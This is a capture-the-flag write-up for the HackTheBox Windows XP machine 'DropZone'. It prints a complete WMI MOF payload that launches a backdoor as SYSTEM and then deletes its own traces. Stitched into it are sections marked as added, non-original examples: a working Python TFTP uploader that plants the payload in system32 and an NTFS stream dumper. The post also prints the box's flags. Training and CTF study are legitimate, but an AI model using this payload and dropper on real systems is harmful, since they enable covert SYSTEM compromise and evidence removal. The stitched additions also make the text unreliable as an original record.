HackTheBox Writeup — DropZone

Hello guys, I am Faisal Husaini. My username on HTB is “smoke”.

This was a pretty tricky box and I learned a lot of things while solving it.

The IP for this machine is and also this is a Windows box

Doing an nmap scan with the command “nmap -sC -sV -oA nmap -Pn”

All TCP ports come back as filtered. I also tried every TCP scan method, but no luck, so now let's scan for UDP ports

After scanning for UDP ports, we find that only one port is open, port 69 running the TFTP service, so let's scan it for version details

Nothing much interesting

Now let's run the TFTP brute-force module from msfconsole and see the results


We set RHOSTS to the target and leave RPORT at its default of 69, but we don't get anything from here

We try to connect to the TFTP server with the “tftp” client

TFTP Connection

So we can get and put files on the TFTP server, which means we can create an .exe backdoor with msfvenom and upload it, but we have no way to execute it.

After asking a friend for a hint, I came to know that I can upload MOF files, so that my .exe backdoor gets executed automatically.

So I create a MOF file that will automatically execute my .exe backdoor

#pragma namespace("\\\\.\\root\\cimv2")

class MyClass49560
{
    [key] string Name;
};

class ActiveScriptEventConsumer : __EventConsumer
{
    [key] string Name;
    [not_null] string ScriptingEngine;
    string ScriptFileName;
    [template] string ScriptText;
    uint32 KillTimeout;
};

// Register the ActiveScriptEventConsumer provider (CLSID is the standard one for it)
instance of __Win32Provider as $P
{
    Name = "ActiveScriptEventConsumer";
    CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
};

instance of __EventConsumerProviderRegistration
{
    Provider = $P;
    ConsumerClassNames = {"ActiveScriptEventConsumer"};
};

// Consumer 1: launches test.exe (relative to the WMI service's working directory, System32),
// then removes its own class, filter and consumer from the repository
instance of ActiveScriptEventConsumer as $cons
{
    Name = "ASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"test.exe\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass49560\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};

// Consumer 2: once test.exe exits, deletes the compiled MOF (wbem\mof\good\vlakeia.mof,
// so the uploaded file must be named vlakeia.mof) and the backdoor, then its own filter/consumer
instance of ActiveScriptEventConsumer as $cons2
{
    Name = "qndASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\vlakeia.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"test.exe\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};

// Filter 1: fires when an instance of MyClass49560 is created (the last statement in this file)
instance of __EventFilter as $Filt
{
    Name = "instfilt";
    Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass49560\"";
    QueryLanguage = "WQL";
};

// Filter 2: fires when the test.exe process disappears
instance of __EventFilter as $Filt2
{
    Name = "qndfilt";
    Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"test.exe\"";
    QueryLanguage = "WQL";
};

instance of __FilterToConsumerBinding as $bind
{
    Consumer = $cons;
    Filter = $Filt;
};

instance of __FilterToConsumerBinding as $bind2
{
    Consumer = $cons2;
    Filter = $Filt2;
};

// Creating this instance is what triggers $Filt -> $cons -> test.exe
instance of MyClass49560 as $MyClass
{
    Name = "ClassConsumer";
};

I will use msfvenom to create my test.exe backdoor in the usual way


Now we will upload the files we created, i.e. the MOF file and the backdoor .exe, through the TFTP server

From the link I referred to earlier, I came to know that I have to upload the MOF file to the “%SystemRoot%\System32\wbem\mof\” directory and the backdoor file to the “%SystemRoot%\System32\” directory, so let's do it

Uploading Files Through TFTP

We uploaded the .exe backdoor in binary mode (TFTP's default netascii mode rewrites line endings and would corrupt an executable)
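The upload step above, as an added example that is not part of the original writeup: a minimal TFTP write client (RFC 1350, octet mode) in Python, plus a pre-flight check for the MOF file. The check catches what makes the WMI service reject a dropped MOF, typographic quotes or dashes picked up from a web page and unbalanced braces, and warns when the cleanup consumer's filename does not match the name you upload. On Windows XP the winmgmt service compiles any MOF dropped into %SystemRoot%\System32\wbem\mof and moves it to wbem\mof\good or wbem\mof\bad (Vista and later no longer do this); because that service runs as LocalSystem, the consumer script and the backdoor it launches run as SYSTEM, which is why no privilege escalation is needed later. The target host, the TFTP root being the drive root, the remote paths and the file names are assumptions; the payload goes first so it is in place when the consumer fires.

```python
"""Added example (not the writeup's own code): pre-flight check for a MOF
file and a minimal TFTP write client to drop it and the payload on the box.
Target host, remote paths and file names are assumptions."""
import socket
import struct
import sys

OP_WRQ, OP_DATA, OP_ACK, OP_ERROR = 2, 3, 4, 5
BLOCK = 512  # RFC 1350 data block size; a block shorter than this ends the transfer

# Characters a copy-paste from a web page tends to introduce; mofcomp does not treat
# them as string delimiters or as '-', and the file ends up in wbem\mof\bad.
TYPOGRAPHIC = {"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'",
               "\u2013": "-", "\u2014": "-"}


def check_mof(text, mof_name):
    """Return a list of problems that would stop the dropped MOF from compiling
    or from cleaning up after itself; an empty list means it looks sane."""
    problems = []
    for ch, plain in TYPOGRAPHIC.items():
        if ch in text:
            problems.append("typographic %r found, use ASCII %r" % (ch, plain))
    if text.count("{") != text.count("}"):
        problems.append("unbalanced braces")
    if mof_name not in text:
        problems.append("cleanup consumer does not reference %s, the compiled copy "
                        "in wbem\\mof\\good will be left behind" % mof_name)
    return problems


def wrq_packet(remote_name, mode="octet"):
    """WRQ: | 02 | filename | 0 | mode | 0 |  ('octet' is what the tftp client calls 'binary')."""
    return struct.pack("!H", OP_WRQ) + remote_name.encode() + b"\0" + mode.encode() + b"\0"


def data_packet(block_no, chunk):
    """DATA: | 03 | block# | up to 512 bytes |  (block numbers wrap at 16 bits)."""
    return struct.pack("!HH", OP_DATA, block_no & 0xFFFF) + chunk


def parse_ack(pkt):
    """Return the acknowledged block number, or raise on a TFTP ERROR packet."""
    op, arg = struct.unpack("!HH", pkt[:4])
    if op == OP_ERROR:
        msg = pkt[4:].rstrip(b"\0").decode(errors="replace")
        raise RuntimeError("TFTP error %d: %s" % (arg, msg))
    if op != OP_ACK:
        raise RuntimeError("unexpected opcode %d" % op)
    return arg


def chunks(data):
    """Yield (block_no, chunk). A final chunk shorter than BLOCK terminates the
    transfer, so a file that is an exact multiple of 512 bytes gets an empty last block."""
    n = 0
    while True:
        n += 1
        piece = data[(n - 1) * BLOCK:n * BLOCK]
        yield n, piece
        if len(piece) < BLOCK:
            return


def tftp_put(host, remote_name, data, port=69, timeout=3.0, retries=3):
    """Write `data` to `remote_name` on the TFTP server; returns the number of bytes sent."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)

    def send_until_acked(pkt, block_no, peer):
        for _ in range(retries):
            sock.sendto(pkt, peer)
            try:
                resp, addr = sock.recvfrom(516)
            except socket.timeout:
                continue
            if parse_ack(resp) == block_no:
                return addr  # the server answers from a fresh transfer port (its TID)
        raise TimeoutError("no ACK for block %d" % block_no)

    try:
        peer = send_until_acked(wrq_packet(remote_name), 0, (host, port))  # ACK 0 accepts the WRQ
        for n, piece in chunks(data):
            send_until_acked(data_packet(n, piece), n, peer)
    finally:
        sock.close()
    return len(data)


if __name__ == "__main__":
    # usage: script.py <host> <local.mof> <local.exe>   (assumed layout, see lead-in)
    host, mof_path, exe_path = sys.argv[1:4]
    mof_text = open(mof_path, encoding="utf-8").read()
    for p in check_mof(mof_text, "vlakeia.mof"):
        sys.exit("refusing to upload: " + p)
    tftp_put(host, "WINDOWS/system32/test.exe", open(exe_path, "rb").read())
    tftp_put(host, "WINDOWS/system32/wbem/mof/vlakeia.mof", mof_text.encode())
```

If the server is a proper TFTP daemon it acknowledges the WRQ with ACK 0 from a new UDP port, and every later DATA block must go to that port; the client above follows the port it sees the ACK come from, which is the detail hand-rolled clients most often get wrong.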

Also set up the listener in msfconsole and wait for the connection back


We got a meterpreter session, now let's dig into it

Now let's run the “sysinfo” and “getuid” commands and see the results


We see that the machine is Windows XP and that we are already NT AUTHORITY\SYSTEM, so we can get both flags without any privilege escalation. So let's get them

Now let's get the user and root flags

2 for the price 1!.txt

We see that a hint is given about ADS, which may be Alternate Data Streams, so we download streams.exe (Sysinternals) and upload it through our meterpreter to run it and fetch the file

Here we encounter another challenge

So we upload the streams.exe file through our meterpreter and run it with the command “streams.exe -s -d flags”, where flags is the folder containing the user and root flags
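Listing and reading the streams in a way that does not destroy them, as an added example that is not from the original post: in Sysinternals streams.exe, -s recurses into subdirectories and -d deletes the streams it finds, so a first pass without -d is the safer habit. This Python version enumerates streams with the FindFirstStreamW/FindNextStreamW API and reads each one through the path:stream syntax NTFS exposes. That API exists from Windows Vista onward; Windows XP, the target of this box, does not have it, which is why streams.exe was needed there. The folder name flags comes from the writeup; the stream-name format (":name:$DATA", with "::$DATA" for the main stream) is how the API reports it, and everything else is assumed.

```python
"""Added example (not the writeup's code): enumerate and read NTFS alternate
data streams of every file under a folder, the way a non-destructive
'streams -s' pass would.  Windows Vista+ only (XP lacks FindFirstStreamW)."""
import ctypes
import os
import sys

MAX_PATH = 260


def parse_stream_name(raw):
    """FindFirstStreamW reports '::$DATA' for the main stream and ':name:$DATA'
    for a named one.  Return (name, type); name is '' for the main stream."""
    parts = raw.split(":")  # a stream name cannot itself contain ':'
    if len(parts) != 3 or parts[0] != "":
        raise ValueError("unexpected stream name %r" % raw)
    return parts[1], parts[2]


def list_streams(path):
    """Return [(stream_name, size)] for every named stream on `path`,
    skipping the unnamed main data stream."""
    if os.name != "nt":
        raise OSError("NTFS alternate data streams need Windows")
    from ctypes import wintypes
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)

    class WIN32_FIND_STREAM_DATA(ctypes.Structure):
        _fields_ = [("StreamSize", ctypes.c_longlong),
                    ("cStreamName", ctypes.c_wchar * (MAX_PATH + 36))]

    k32.FindFirstStreamW.restype = wintypes.HANDLE
    k32.FindFirstStreamW.argtypes = [wintypes.LPCWSTR, ctypes.c_int, ctypes.c_void_p, wintypes.DWORD]
    k32.FindNextStreamW.restype = wintypes.BOOL
    k32.FindNextStreamW.argtypes = [wintypes.HANDLE, ctypes.c_void_p]
    k32.FindClose.argtypes = [wintypes.HANDLE]
    invalid_handle = wintypes.HANDLE(-1).value

    data = WIN32_FIND_STREAM_DATA()
    h = k32.FindFirstStreamW(path, 0, ctypes.byref(data), 0)  # 0 = FindStreamInfoStandard
    if h == invalid_handle:
        raise ctypes.WinError(ctypes.get_last_error())
    found = []
    try:
        while True:
            name, _kind = parse_stream_name(data.cStreamName)
            if name:  # skip '::$DATA', the file's normal contents
                found.append((name, data.StreamSize))
            if not k32.FindNextStreamW(h, ctypes.byref(data)):
                break  # ERROR_HANDLE_EOF: no more streams
    finally:
        k32.FindClose(h)
    return found


def read_stream(path, stream):
    """NTFS exposes a named stream as path:stream, so a plain open() reads it."""
    with open("%s:%s" % (path, stream), "rb") as f:
        return f.read()


def dump_streams(root):
    """Walk `root` (e.g. the box's 'flags' folder) and return
    {file_path: {stream_name: contents}} for files that carry named streams."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = os.path.join(dirpath, fn)
            streams = list_streams(p)
            if streams:
                out[p] = {name: read_stream(p, name) for name, _size in streams}
    return out


if __name__ == "__main__":
    # usage: script.py <folder>   e.g. the 'flags' directory from the writeup (assumed path)
    for path, streams in dump_streams(sys.argv[1]).items():
        for name, contents in streams.items():
            print("%s:%s (%d bytes): %r" % (path, name, len(contents), contents[:80]))
```

Because the API returns the stream name alongside its size, a flag hidden in the name of a stream shows up in the listing even before the contents are read; the reading step covers the other common placement, where the hash is the stream's contents.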

The Flags

Here in the picture we can see that we got both the user flag and the root flag

User Flag → a6a4830ddd27a1bddd59d2aaa80f7940
Root Flag → 3316ffe05fada8f8e651931a5c45edab

This box was hard for me, and it was a totally new thing that I saw

Arbitrary file write through TFTP into wbem\mof (auto-compiled by the WMI service) → backdoor running as SYSTEM

Alternate Data Streams → To get both the flags


I didn't have any idea about MOF files, so I referred to this link → http://poppopret.blogspot.com/2011/09/playing-with-mof-files-on-windows-for.html
